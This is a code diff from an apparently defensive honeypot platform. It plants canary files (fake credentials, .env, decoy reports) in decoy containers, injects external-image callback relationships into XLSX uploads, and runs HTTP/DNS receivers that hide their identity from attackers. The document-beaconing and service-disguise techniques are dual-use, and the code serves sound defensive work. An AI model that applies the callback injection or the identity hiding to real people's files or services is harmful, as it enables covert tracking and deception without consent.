    # First matching member in archive order wins.
    target_rels = next(
        (info.filename for info, _ in entries if info.filename in _RELS_PATHS),
        None,
    )
    if not target_rels:
        raise InstrumenterRejectedError(
            "XLSX has no workbook relationships file to mutate"
        )

    rid = ""
    rewritten = []
    for info, payload in entries:
        if info.filename == target_rels:
            rid = _next_rid(payload)
            payload = _inject_relationship(payload, rid, url)
        rewritten.append((info, payload))

    rebuilt = io.BytesIO()
    with zipfile.ZipFile(rebuilt, "w", zipfile.ZIP_DEFLATED) as archive_out:
        for info, payload in rewritten:
            archive_out.writestr(info, payload)
    return rebuilt.getvalue(), rid, target_rels
|
||||
|
||||
|
||||
class XlsxInstrumenter(CanaryInstrumenter):
    """Instrument uploaded XLSX files with an external-image relationship."""

    name = "xlsx"
    mime_prefixes = (
        "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet",
    )

    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        """Return the mutated workbook as an artifact placed at ``target_path``.

        The callback URL is ``<http_base>/c/<callback_token>``; errors from
        the archive rewrite propagate as ``InstrumenterRejectedError``.
        """
        base = ctx.http_base.rstrip("/")
        callback = f"{base}/c/{ctx.callback_token}"
        payload, rel_id, rels_member = _mutate(blob, callback)
        note = (
            f"injected external-image relationship {rel_id} into "
            f"{rels_member} -> {callback}"
        )
        return CanaryArtifact(
            path=target_path,
            content=payload,
            mode=0o644,
            mtime_offset=-86400 * 14,
            instrumenter=self.name,
            notes=[note],
        )
|
||||
@@ -1,82 +0,0 @@
|
||||
"""Persona-aware path resolution for canary artifacts.
|
||||
|
||||
Linux-persona deckies use POSIX-shaped paths under ``/home/<user>``.
|
||||
"Windows" personas (still Linux containers under the hood — see
|
||||
:mod:`decnet.archetypes`) use Windows-shaped paths under
|
||||
``/home/<user>/AppData/...`` so an attacker browsing the filesystem
|
||||
through a planted RDP/SMB session sees the right shape.
|
||||
|
||||
The persona lookup is best-effort: callers pass the
|
||||
:attr:`decnet.archetypes.Archetype.nmap_os` value (``"linux"`` or
|
||||
``"windows"``); unknown personas fall through to ``"linux"``.
|
||||
Operators can always override by passing an explicit
|
||||
``placement_path`` when creating a token.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
DEFAULT_LINUX_USER = "admin"
|
||||
DEFAULT_WINDOWS_USER = "Administrator"
|
||||
|
||||
# Canonical placements for the synthesizer-driven baseline tokens.
|
||||
# Operators can override per-token via the API, but these are the
|
||||
# defaults the deploy-time seed uses.
|
||||
_LINUX_DEFAULTS: dict[str, str] = {
|
||||
"git_config": "/home/{user}/.git/config",
|
||||
"env_file": "/home/{user}/.env",
|
||||
"ssh_key": "/home/{user}/.ssh/id_rsa",
|
||||
"aws_creds": "/home/{user}/.aws/credentials",
|
||||
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
||||
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
||||
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
||||
}
|
||||
|
||||
_WINDOWS_DEFAULTS: dict[str, str] = {
|
||||
"git_config": "/home/{user}/AppData/Local/Programs/Git/etc/gitconfig",
|
||||
"env_file": "/home/{user}/Desktop/prod.env",
|
||||
"ssh_key": "/home/{user}/.ssh/id_rsa", # OpenSSH on Windows uses the same path
|
||||
"aws_creds": "/home/{user}/.aws/credentials",
|
||||
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
||||
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
||||
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
||||
}
|
||||
|
||||
|
||||
def default_user(persona: str) -> str:
    """Return the default account name used in placement paths for a persona.

    ``"windows"`` maps to ``DEFAULT_WINDOWS_USER``; every other value maps
    to ``DEFAULT_LINUX_USER``.
    """
    if persona == "windows":
        return DEFAULT_WINDOWS_USER
    return DEFAULT_LINUX_USER
|
||||
|
||||
|
||||
def default_path_for(generator: str, persona: str = "linux") -> str:
    """Return the default placement path for ``generator`` under ``persona``.

    The Windows table is used only for ``persona == "windows"``; any other
    persona uses the Linux table. The ``{user}`` placeholder is expanded
    with the persona's default user before returning.
    """
    if persona == "windows":
        defaults = _WINDOWS_DEFAULTS
    else:
        defaults = _LINUX_DEFAULTS
    template = defaults.get(generator)
    if template:
        return template.format(user=default_user(persona))
    # Unknown generator — fall back to a generic /tmp drop so the
    # planter still has somewhere to write. The API rejects
    # unknown generators upstream, so this branch is defensive.
    return f"/tmp/{generator}.canary"  # nosec B108 — placement inside attacker-facing decoy container, not host /tmp
|
||||
|
||||
|
||||
def normalize_placement(path: str) -> str:
    """Validate an operator-supplied placement path.

    Checks, in order:

    * the path is non-empty and absolute (starts with ``/``);
    * it contains no NUL byte;
    * it contains no CR / LF;
    * no ``/``-separated segment is exactly ``..``.

    Shell metacharacters are *not* rejected here; code that embeds the
    path in a shell command is expected to quote it.

    Args:
        path: Candidate placement path.

    Returns:
        ``path`` unchanged when every check passes.

    Raises:
        ValueError: With a message naming the failed check, so the API
            can return a 400 with a clear explanation.
    """
    if not path or not path.startswith("/"):
        raise ValueError("placement_path must be absolute (start with '/')")
    if "\x00" in path:
        raise ValueError("placement_path may not contain NUL")
    if "\n" in path or "\r" in path:
        raise ValueError("placement_path may not contain newlines")
    # Compare whole segments: a substring test for "../" would also
    # reject harmless names that merely end in dots ("/srv/backups../x").
    if ".." in path.split("/"):
        raise ValueError("placement_path may not contain '..' segments")
    return path
|
||||
@@ -1,301 +0,0 @@
|
||||
"""Plant / revoke canary artifacts inside running decky containers.
|
||||
|
||||
Single entry point per operation:
|
||||
|
||||
* :func:`plant` writes a :class:`CanaryArtifact` into one decky's
|
||||
filesystem via ``docker exec`` (mirroring the SSH driver's
|
||||
``_run_file`` pattern), backdates the mtime, sets the requested
|
||||
mode, and publishes ``canary.{token_id}.placed`` on the bus.
|
||||
* :func:`revoke` unlinks the file (best-effort) and publishes
|
||||
``canary.{token_id}.revoked``.
|
||||
* :func:`seed_baseline` is the deploy-hook helper: synthesises the
|
||||
configured baseline set for one decky, persists rows, plants each.
|
||||
Failures are logged but do **not** abort the deploy (the deployer
|
||||
hook calls this best-effort).
|
||||
|
||||
We don't reuse :class:`SSHDriver` directly because the orchestrator
|
||||
driver is tied to its action types (``FileAction`` carries str
|
||||
content; canary content is bytes). The planter takes the same
|
||||
shape but speaks bytes-via-base64 over the wire.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import base64
|
||||
import os
|
||||
import shlex
|
||||
import time
|
||||
from secrets import token_urlsafe
|
||||
from typing import Any, Iterable, Optional
|
||||
|
||||
from decnet.bus import topics
|
||||
from decnet.bus.base import BaseBus
|
||||
from decnet.bus.factory import get_bus
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext
|
||||
from decnet.canary.factory import get_generator
|
||||
from decnet.canary.paths import default_path_for
|
||||
from decnet.logging import get_logger
|
||||
from decnet.web.db.repository import BaseRepository
|
||||
|
||||
# Module-level logger for the planter.
log = get_logger("canary.planter")

# Executable placed at argv[0] of every container command.
_DOCKER = "docker"
# Seconds one subprocess round-trip may take before ``_run`` gives up.
_TIMEOUT = 8.0
# Container suffix — matches the orchestrator SSH driver's convention
# (``<decky_name>-ssh``). Canary placement always happens through the
# ssh container because every decky has one and it carries the most
# realistic filesystem layout.
_SSH_CONTAINER_SUFFIX = "-ssh"
|
||||
|
||||
|
||||
def _container_for(decky_name: str) -> str:
    """Return the name of the ssh container that belongs to *decky_name*."""
    return "{}{}".format(decky_name, _SSH_CONTAINER_SUFFIX)
|
||||
|
||||
|
||||
def _dirname(path: str) -> str:
|
||||
idx = path.rfind("/")
|
||||
if idx <= 0:
|
||||
return "/"
|
||||
return path[:idx]
|
||||
|
||||
|
||||
async def _run(
    argv: list[str], *, stdin_bytes: Optional[bytes] = None,
) -> tuple[int, str, str]:
    """Run *argv* as a subprocess and report the outcome as data.

    Args:
        argv: Command and arguments, executed without a shell.
        stdin_bytes: Optional payload written to the child's stdin; when
            ``None`` no stdin pipe is attached.

    Returns:
        ``(returncode, stdout, stderr)`` with both streams decoded as
        UTF-8 (undecodable bytes replaced). Two synthetic results exist:
        ``(127, "", "argv[0] not found: …")`` when the executable is
        missing and ``(124, "", "timeout")`` when the command exceeds
        ``_TIMEOUT`` seconds.
    """
    try:
        proc = await asyncio.create_subprocess_exec(
            *argv,
            stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE,
        )
    except FileNotFoundError as exc:
        return 127, "", f"argv[0] not found: {exc}"
    try:
        stdout, stderr = await asyncio.wait_for(
            proc.communicate(input=stdin_bytes), timeout=_TIMEOUT,
        )
    except asyncio.TimeoutError:
        try:
            proc.kill()
        except ProcessLookupError:
            # The child exited between the timeout and the kill.
            pass
        # Reap the child so it does not linger as a zombie and its
        # pipes / transport are released.
        await proc.wait()
        return 124, "", "timeout"
    return (
        proc.returncode if proc.returncode is not None else -1,
        stdout.decode("utf-8", "replace"),
        stderr.decode("utf-8", "replace"),
    )
|
||||
|
||||
|
||||
def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]:
    """Build the ``sh -c`` script and the stdin payload for *artifact*.

    The content is base64-encoded on the host and meant to be streamed
    over stdin into ``base64 -d`` inside the container, so the raw bytes
    never ride on argv (where the kernel's ARG_MAX would cap them).
    The script creates the parent directory, writes the decoded file,
    applies the octal mode and finally stamps the mtime with
    ``touch -d @<unix_ts>``; the steps are chained with ``&&`` so the
    first failure stops the sequence.

    Returns:
        ``(script, base64_payload)``.
    """
    payload = base64.b64encode(artifact.content)
    stamp = int(time.time() + artifact.mtime_offset)
    perms = oct(artifact.mode)[2:]
    target = shlex.quote(artifact.path)
    parent = shlex.quote(_dirname(artifact.path))
    script = " && ".join((
        f"mkdir -p {parent}",
        f"base64 -d > {target}",
        f"chmod {perms} {target}",
        f"touch -d @{stamp} {target}",
    ))
    return script, payload
|
||||
|
||||
|
||||
async def _publish(
    bus: Optional[BaseBus], topic: str, payload: dict[str, Any],
) -> None:
    """Best-effort publish — never raises.

    Args:
        bus: An already-connected bus to reuse, or ``None`` to obtain
            one from :func:`get_bus` for this single publish.
        topic: Bus topic to publish on.
        payload: Event body.

    When the bus is obtained here it is connected before the publish
    and closed afterwards, including when the publish itself fails.
    Any exception is logged as a warning and swallowed (delivery is
    at-most-once by contract; the DB row is source of truth).
    """
    try:
        if bus is not None:
            # Caller owns the connection; its lifecycle is not ours.
            await bus.publish(topic, payload)
            return
        target = get_bus()
        await target.connect()
        try:
            await target.publish(topic, payload)
        finally:
            # Close on failure too, so a failed publish does not leave
            # the temporary connection open.
            await target.close()
    except Exception as e:  # noqa: BLE001
        log.warning("canary bus publish failed topic=%s err=%s", topic, e)
|
||||
|
||||
|
||||
async def plant(
    decky_name: str,
    artifact: CanaryArtifact,
    *,
    token_uuid: str,
    repo: Optional[BaseRepository] = None,
    publish: bool = True,
    bus: Optional[BaseBus] = None,
) -> tuple[bool, Optional[str]]:
    """Write *artifact* into the decky's ssh container via ``docker exec``.

    Args:
        decky_name: Decky whose ``<name>-ssh`` container receives the file.
        artifact: Content, path, mode and mtime offset to plant.
        token_uuid: Token row to update and to name in the bus event.
        repo: When given, the token state is set to ``planted`` or
            ``failed`` (with the error text) to match the outcome.
        publish: When true, a ``placed`` event is published on success.
        bus: Optional bus handed through to the publish helper.

    Returns:
        ``(success, error_or_none)``. Docker failures are reported
        through this tuple rather than raised; the error is the first
        256 characters of stderr, or ``rc=<code>`` when stderr is empty.
    """
    if not artifact.path:
        reason = "planter requires a non-empty artifact.path"
        log.warning("canary.plant skipped: %s decky=%s token=%s", reason, decky_name, token_uuid)
        if repo is not None:
            await repo.update_canary_token_state(token_uuid, "failed", reason)
        return False, reason

    script, payload = _build_plant_command(artifact)
    # ``-i`` keeps stdin attached so base64 -d inside the container can
    # consume the encoded payload streamed from the host.
    rc, _out, stderr = await _run(
        [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", script],
        stdin_bytes=payload,
    )

    if rc != 0:
        error = stderr.strip()[:256] or f"rc={rc}"
        if repo is not None:
            await repo.update_canary_token_state(token_uuid, "failed", error)
        log.warning(
            "canary.plant failed decky=%s token=%s rc=%d stderr=%r",
            decky_name, token_uuid, rc, stderr[:120],
        )
        return False, error

    if repo is not None:
        await repo.update_canary_token_state(token_uuid, "planted", None)
    if publish:
        await _publish(bus, topics.canary(token_uuid, topics.CANARY_PLACED), {
            "token_id": token_uuid,
            "decky_name": decky_name,
            "placement_path": artifact.path,
            "instrumenter": artifact.instrumenter,
            "generator": artifact.generator,
        })
    return True, None
|
||||
|
||||
|
||||
async def revoke(
    decky_name: str,
    placement_path: str,
    *,
    token_uuid: str,
    repo: Optional[BaseRepository] = None,
    publish: bool = True,
    bus: Optional[BaseBus] = None,
) -> tuple[bool, Optional[str]]:
    """Remove a planted canary file and record the revocation.

    Runs ``rm -f`` on *placement_path* inside the decky's ssh container.
    Because of ``-f`` an already-missing file still counts as success;
    only a failing ``docker exec`` yields ``success=False``.

    Regardless of the outcome the token state is set to ``revoked``
    (carrying the error text on failure) when *repo* is given, and a
    ``revoked`` event is published when *publish* is true.

    Returns:
        ``(success, error_or_none)``.
    """
    unlink_script = "rm -f " + shlex.quote(placement_path)
    rc, _out, stderr = await _run(
        [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", unlink_script],
    )
    if rc == 0:
        success, error = True, None
    else:
        success, error = False, (stderr.strip()[:256] or f"rc={rc}")

    if repo is not None:
        await repo.update_canary_token_state(token_uuid, "revoked", error)

    if publish:
        event = {
            "token_id": token_uuid,
            "decky_name": decky_name,
            "placement_path": placement_path,
        }
        await _publish(bus, topics.canary(token_uuid, topics.CANARY_REVOKED), event)

    return success, error
|
||||
|
||||
|
||||
def _baseline_set() -> Iterable[str]:
|
||||
"""Return the configured baseline generator names.
|
||||
|
||||
Honors ``DECNET_CANARY_BASELINE`` (comma-separated). Default is
|
||||
a sensible mix that exercises every callback-bearing generator
|
||||
plus a passive aws_creds drop for realism.
|
||||
"""
|
||||
raw = os.environ.get(
|
||||
"DECNET_CANARY_BASELINE",
|
||||
"git_config,env_file,honeydoc,aws_creds",
|
||||
)
|
||||
return [n.strip() for n in raw.split(",") if n.strip()]
|
||||
|
||||
|
||||
def _ctx_for(slug: str) -> CanaryContext:
    """Create the :class:`CanaryContext` for one callback slug.

    ``http_base`` comes from ``DECNET_CANARY_HTTP_BASE`` (default
    ``http://localhost:8088``) and ``dns_zone`` from
    ``DECNET_CANARY_DNS_ZONE`` (default empty).
    """
    env = os.environ
    return CanaryContext(
        callback_token=slug,
        http_base=env.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088"),
        dns_zone=env.get("DECNET_CANARY_DNS_ZONE", ""),
    )
|
||||
|
||||
|
||||
async def seed_baseline(
    decky_name: str,
    repo: BaseRepository,
    *,
    persona: str = "linux",
    created_by: str = "system",
    bus: Optional[BaseBus] = None,
) -> list[dict[str, Any]]:
    """Create and plant the baseline canary tokens for one decky.

    For every configured generator name: build the artifact, place it at
    the persona's default path, persist a token row, then attempt the
    plant. Unknown generator names are logged and skipped. A failed
    plant leaves its row in ``state=failed``; the return value is
    informational rather than authoritative.

    Returns:
        One summary dict per row created (``token_uuid``, ``generator``,
        ``kind``, ``callback_token``, ``placement_path``), whether or
        not the plant succeeded, so callers can surface them in the
        deploy report.
    """
    from uuid import uuid4

    summaries: list[dict[str, Any]] = []
    for gen_name in _baseline_set():
        try:
            generator = get_generator(gen_name)
        except ValueError:
            log.warning("canary.seed_baseline: unknown generator %r — skipping", gen_name)
            continue

        slug = token_urlsafe(16)
        artifact = generator.generate(_ctx_for(slug))
        artifact.path = default_path_for(gen_name, persona)
        kind = "aws_passive" if gen_name == "aws_creds" else "http"

        # The row is written before planting so plant() has something
        # to update when the docker step fails.
        token_uuid = str(uuid4())
        row = {
            "uuid": token_uuid,
            "kind": kind,
            "decky_name": decky_name,
            "blob_uuid": None,
            "instrumenter": None,
            "generator": gen_name,
            "placement_path": artifact.path,
            "callback_token": slug,
            "secret_seed": slug,
            "created_by": created_by,
            "state": "planted",  # optimistic — plant() flips to failed on error
        }
        await repo.create_canary_token(row)
        await plant(
            decky_name, artifact,
            token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
        )
        summaries.append({
            "token_uuid": token_uuid, "generator": gen_name, "kind": kind,
            "callback_token": slug, "placement_path": artifact.path,
        })
    return summaries
|
||||
@@ -1,89 +0,0 @@
|
||||
"""Filesystem store for operator-uploaded canary blobs.
|
||||
|
||||
Blobs live under ``/var/lib/decnet/canary/blobs/<sha256>`` (override
|
||||
via ``DECNET_CANARY_BLOB_DIR``) and are deduplicated by content hash.
|
||||
The DB table :class:`decnet.web.db.models.CanaryBlob` mirrors
|
||||
metadata; the bytes are read on demand at instrumentation time, so
|
||||
the API process never holds large operator uploads in memory longer
|
||||
than the request itself.
|
||||
|
||||
Refcount-aware deletion is enforced at the DB layer (see
|
||||
:meth:`decnet.web.db.repository.BaseRepository.delete_canary_blob`);
|
||||
this module only provides write/read/unlink primitives keyed by
|
||||
sha256.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import os
|
||||
from pathlib import Path
|
||||
from typing import Tuple
|
||||
|
||||
|
||||
def blob_dir() -> Path:
    """Return the root directory under which canary blobs are stored.

    ``DECNET_CANARY_BLOB_DIR`` overrides the default
    ``/var/lib/decnet/canary/blobs`` (handy for pointing tests at a
    temporary directory). Nothing is created here.
    """
    location = os.getenv("DECNET_CANARY_BLOB_DIR", "/var/lib/decnet/canary/blobs")
    return Path(location)
|
||||
|
||||
|
||||
def _path_for(sha256: str) -> Path:
|
||||
# Two-level fan-out (``ab/cd/abcd...``) keeps any one directory
|
||||
# from accumulating thousands of entries on busy fleets. Same
|
||||
# shape as Git's loose-object store.
|
||||
if len(sha256) < 4:
|
||||
raise ValueError("sha256 must be at least 4 chars")
|
||||
root = blob_dir()
|
||||
return root / sha256[:2] / sha256[2:4] / sha256
|
||||
|
||||
|
||||
def write_blob(content: bytes) -> Tuple[str, Path, int]:
    """Store *content* at the path derived from its SHA-256 digest.

    If a file already exists at that path it is left untouched, which
    makes repeated writes of the same bytes a no-op. Otherwise the
    bytes go to a ``.part`` sibling first and are then renamed into
    place, so a concurrent reader never sees a half-written file.

    Returns:
        ``(sha256_hex, path, size_in_bytes)``.
    """
    digest = hashlib.sha256(content).hexdigest()
    destination = _path_for(digest)
    destination.parent.mkdir(parents=True, exist_ok=True)
    if destination.exists():
        return digest, destination, len(content)

    staging = destination.with_suffix(destination.suffix + ".part")
    staging.write_bytes(content)
    os.replace(staging, destination)
    return digest, destination, len(content)
|
||||
|
||||
|
||||
def read_blob(sha256: str) -> bytes:
    """Return the stored bytes for the blob keyed by *sha256*.

    Raises:
        FileNotFoundError: When the file is no longer on disk (for
            example after an operator pruned the blob directory by
            hand); the caller can surface that so the blob is
            re-uploaded.
    """
    blob_path = _path_for(sha256)
    return blob_path.read_bytes()
|
||||
|
||||
|
||||
def unlink_blob(sha256: str) -> bool:
    """Remove the on-disk file for *sha256*.

    Intended to run *after* the matching DB row has been deleted, so a
    crash in between leaves an orphaned file rather than a DB row that
    points at nothing.

    Returns:
        ``True`` if a file was deleted, ``False`` if none existed.
    """
    blob_path = _path_for(sha256)
    try:
        blob_path.unlink()
    except FileNotFoundError:
        return False
    else:
        return True
|
||||
@@ -1,254 +0,0 @@
|
||||
"""``decnet canary`` worker — HTTP + DNS callback receivers.
|
||||
|
||||
Two surfaces, one process:
|
||||
|
||||
* **HTTP** — a tiny FastAPI app on its own port (default 8088). The
|
||||
only useful route is ``GET /c/{slug}`` which looks up the slug in
|
||||
the canary token table, persists a :class:`CanaryTrigger` row,
|
||||
publishes ``canary.<token_id>.triggered`` on the bus, and returns
|
||||
a 1×1 transparent GIF with status 200 — the same response whether
|
||||
or not the slug is known.
|
||||
* **DNS** — an authoritative UDP server (default port 5353; set
|
||||
``DECNET_CANARY_DNS_PORT`` to change it) for ``*.<canary_zone>``. Same lookup + persist +
|
||||
publish flow, plus a sinkhole A record so the attacker's resolver
|
||||
doesn't loop on NXDOMAIN.
|
||||
|
||||
Both surfaces are **stealth** by policy
|
||||
(:mod:`feedback_stealth`): no DECNET strings in headers / banners /
|
||||
error pages. The HTTP app strips the default ``Server: uvicorn``
|
||||
header in middleware; FastAPI's docs/openapi UI is disabled because
|
||||
discovering them would tip off the attacker that this is a honeypot.
|
||||
|
||||
The worker is supervised by its own systemd unit
|
||||
(``decnet-canary.service``); like every other DECNET worker, it
|
||||
crashes loudly rather than masking failures.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import os
|
||||
from datetime import datetime, timezone
|
||||
from typing import Optional
|
||||
|
||||
from fastapi import FastAPI, Request, Response
|
||||
|
||||
from decnet.bus import topics
|
||||
from decnet.bus.base import BaseBus
|
||||
from decnet.bus.factory import get_bus
|
||||
from decnet.canary.dns_server import CanaryDNSProtocol, DNSQuery
|
||||
from decnet.logging import get_logger
|
||||
from decnet.web.db.factory import get_repository
|
||||
from decnet.web.db.repository import BaseRepository
|
||||
|
||||
# Module-level logger for the canary worker.
log = get_logger("canary.worker")

# 1×1 transparent GIF — public-domain canonical bytes. Returning the
# same image every time is fine: the body has no information the
# attacker shouldn't see, and image clients cache it.
# Served as the body of every ``/c/{slug}`` response.
_TRANSPARENT_GIF = bytes.fromhex(
    "47494638396101000100800100000000ffffff21f90401000001002c00000000010001000002024401003b"
)
|
||||
|
||||
|
||||
def _http_base() -> str:
|
||||
return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
|
||||
|
||||
|
||||
def _dns_zone() -> str:
|
||||
return os.environ.get("DECNET_CANARY_DNS_ZONE", "").strip(".").lower()
|
||||
|
||||
|
||||
def _http_port() -> int:
|
||||
return int(os.environ.get("DECNET_CANARY_HTTP_PORT", "8088"))
|
||||
|
||||
|
||||
def _dns_port() -> int:
|
||||
# Default 5353 (mDNS-ish, non-privileged) — operators pin :53 via
|
||||
# NAT or a CAP_NET_BIND_SERVICE-enabled unit.
|
||||
return int(os.environ.get("DECNET_CANARY_DNS_PORT", "5353"))
|
||||
|
||||
|
||||
def _dns_bind() -> str:
|
||||
return os.environ.get("DECNET_CANARY_DNS_BIND", "0.0.0.0") # nosec B104 — attacker-facing decoy listener, internet exposure is the design
|
||||
|
||||
|
||||
def _http_bind() -> str:
|
||||
return os.environ.get("DECNET_CANARY_HTTP_BIND", "0.0.0.0") # nosec B104 — same rationale
|
||||
|
||||
|
||||
# ---------------------------- HTTP surface --------------------------------
|
||||
|
||||
|
||||
def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
    """Construct the FastAPI app.

    Disables docs / openapi / redoc — operators query the canary
    surface via the *main* DECNET API, never directly. Anyone hitting
    these paths is either misconfigured or scanning for a honeypot.

    Args:
        repo: Repository handed to ``_record_hit`` for every callback.
        bus: Bus handed to ``_record_hit`` for every callback.

    Returns:
        An app with one middleware (header rewrite) and two routes:
        ``GET /c/{slug}`` and ``GET /``.
    """
    app = FastAPI(
        title="",  # don't leak "DECNET" in OpenAPI
        docs_url=None, redoc_url=None, openapi_url=None,
    )

    @app.middleware("http")
    async def _stealth_headers(request: Request, call_next):
        # Runs around every request; only the outgoing headers are touched.
        response: Response = await call_next(request)
        # Strip the uvicorn / starlette banner; replace with a
        # generic Server line that matches what most CDNs return.
        response.headers["Server"] = "nginx"
        # Don't leak request id / process id headers.
        if "x-process-time" in response.headers:
            del response.headers["x-process-time"]
        return response

    @app.get("/c/{slug}")
    async def callback(slug: str, request: Request) -> Response:
        # Record first, answer second: the response never depends on
        # what ``_record_hit`` found.
        await _record_hit(
            repo, bus,
            slug=slug,
            src_ip=_client_ip(request),
            user_agent=request.headers.get("user-agent"),
            request_path=str(request.url.path),
            dns_qname=None,
            raw_headers=dict(request.headers),
        )
        # Always 200 with a tiny image so the attacker's client sees
        # a "success" — same return regardless of whether the slug is
        # known. Stealth: do NOT distinguish unknown vs known via
        # status code or response body.
        return Response(content=_TRANSPARENT_GIF, media_type="image/gif")

    @app.get("/")
    async def root() -> Response:
        # Bare root returns a generic 404. The decoy posture: pretend
        # to be an empty static-file host that just happens to resolve
        # /c/<slug> when it matches.
        return Response(status_code=404)

    return app
|
||||
|
||||
|
||||
def _client_ip(request: Request) -> str:
|
||||
# Honor X-Forwarded-For if the operator deployed behind a reverse
|
||||
# proxy. Take the leftmost address in the chain; everything after
|
||||
# is upstream-proxy noise.
|
||||
fwd = request.headers.get("x-forwarded-for")
|
||||
if fwd:
|
||||
return fwd.split(",", 1)[0].strip()
|
||||
if request.client:
|
||||
return request.client.host
|
||||
return "0.0.0.0" # nosec B104 — sentinel for "unknown remote"
|
||||
|
||||
|
||||
# ---------------------------- shared persistence -------------------------
|
||||
|
||||
|
||||
async def _record_hit(
    repo: BaseRepository,
    bus: BaseBus,
    *,
    slug: str,
    src_ip: str,
    user_agent: Optional[str],
    request_path: Optional[str],
    dns_qname: Optional[str],
    raw_headers: Optional[dict],
) -> None:
    """Turn one callback into a stored trigger plus a bus event.

    The slug is looked up in the token table. Unknown slugs return
    immediately without storing anything: the caller answers known and
    unknown slugs identically, and persisting every random scan would
    only clutter the DB. For a known slug a trigger row is recorded and
    a ``triggered`` event is published; a publish failure is logged and
    swallowed.
    """
    token = await repo.get_canary_token_by_slug(slug)
    if token is None:
        return

    trigger_row = {
        "token_uuid": token["uuid"],
        "occurred_at": datetime.now(timezone.utc),
        "src_ip": src_ip,
        "user_agent": user_agent,
        "request_path": request_path,
        "dns_qname": dns_qname,
        "raw_headers": raw_headers or {},
    }
    trigger_id = await repo.record_canary_trigger(trigger_row)

    try:
        topic = topics.canary(token["uuid"], topics.CANARY_TRIGGERED)
        event = {
            "token_id": token["uuid"],
            "trigger_id": trigger_id,
            "decky_name": token["decky_name"],
            "src_ip": src_ip,
            "user_agent": user_agent,
            "request_path": request_path,
            "dns_qname": dns_qname,
        }
        await bus.publish(topic, event)
    except Exception as e:  # noqa: BLE001 — best effort
        log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
|
||||
|
||||
|
||||
# ---------------------------- DNS surface --------------------------------
|
||||
|
||||
|
||||
async def _start_dns_server(
    repo: BaseRepository, bus: BaseBus, *, loop: asyncio.AbstractEventLoop,
) -> Optional[asyncio.DatagramTransport]:
    """Start the UDP DNS listener when a canary zone is configured.

    Returns:
        The datagram transport of the listener, or ``None`` when
        ``DECNET_CANARY_DNS_ZONE`` is empty and the DNS surface stays off.
    """
    zone = _dns_zone()
    if not zone:
        log.info("canary.dns disabled (DECNET_CANARY_DNS_ZONE unset)")
        return None

    async def _hook(slug: str, query: DNSQuery, src_ip: str) -> None:
        # DNS hits carry no HTTP metadata, only the queried name.
        await _record_hit(
            repo, bus,
            slug=slug,
            src_ip=src_ip,
            user_agent=None,
            request_path=None,
            dns_qname=query.qname,
            raw_headers=None,
        )

    def _protocol_factory() -> CanaryDNSProtocol:
        return CanaryDNSProtocol(zone, _hook)

    bind_addr = _dns_bind()
    port = _dns_port()
    transport, _proto = await loop.create_datagram_endpoint(
        _protocol_factory,
        local_addr=(bind_addr, port),
    )
    log.info("canary.dns listening zone=%s port=%d", zone, port)
    return transport  # type: ignore[return-value]
|
||||
|
||||
|
||||
# ---------------------------- entry point --------------------------------
|
||||
|
||||
|
||||
async def run() -> None:
    """Worker entry point — kicked off by ``decnet canary``.

    Initialises the repository, connects the bus, starts the optional
    DNS listener and then serves the HTTP app until uvicorn returns.
    The DNS transport (if any) and the bus are closed on the way out,
    including when start-up fails after the bus is connected (for
    example when the DNS port cannot be bound). Exceptions still
    propagate, so the supervisor sees the crash.
    """
    import uvicorn

    repo = get_repository()
    await repo.initialize()
    bus = get_bus()
    await bus.connect()

    dns_transport = None
    try:
        app = _build_app(repo, bus)
        config = uvicorn.Config(
            app,
            host=_http_bind(),
            port=_http_port(),
            log_level="warning",
            access_log=False,  # stealth: no per-request lines
            server_header=False,  # we set Server: nginx in middleware
        )
        server = uvicorn.Server(config)
        loop = asyncio.get_running_loop()
        # Started inside the try block so a bind failure still reaches
        # the bus.close() below.
        dns_transport = await _start_dns_server(repo, bus, loop=loop)
        await server.serve()
    finally:
        if dns_transport is not None:
            dns_transport.close()
        await bus.close()
|
||||
|
||||
|
||||
def main() -> None:
    """CLI entry point — synchronous wrapper for ``asyncio.run``.

    Blocks until :func:`run` finishes; anything it raises propagates to
    the caller.
    """
    asyncio.run(run())
|
||||
461
decnet/cli.py
Normal file
461
decnet/cli.py
Normal file
@@ -0,0 +1,461 @@
|
||||
"""
|
||||
DECNET CLI — entry point for all commands.
|
||||
|
||||
Usage:
|
||||
decnet deploy --mode unihost --deckies 5 --randomize-services
|
||||
decnet status
|
||||
decnet teardown [--all | --id decky-01]
|
||||
decnet services
|
||||
"""
|
||||
|
||||
import random
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
from rich.console import Console
|
||||
from rich.table import Table
|
||||
|
||||
from decnet.archetypes import Archetype, all_archetypes, get_archetype
|
||||
from decnet.config import (
|
||||
DeckyConfig,
|
||||
DecnetConfig,
|
||||
random_hostname,
|
||||
)
|
||||
from decnet.distros import all_distros, get_distro, random_distro
|
||||
from decnet.ini_loader import IniConfig, load_ini
|
||||
from decnet.network import detect_interface, detect_subnet, allocate_ips, get_host_ip
|
||||
from decnet.services.registry import all_services
|
||||
|
||||
# Root Typer application; subcommands attach via ``@app.command()``.
app = typer.Typer(
    name="decnet",
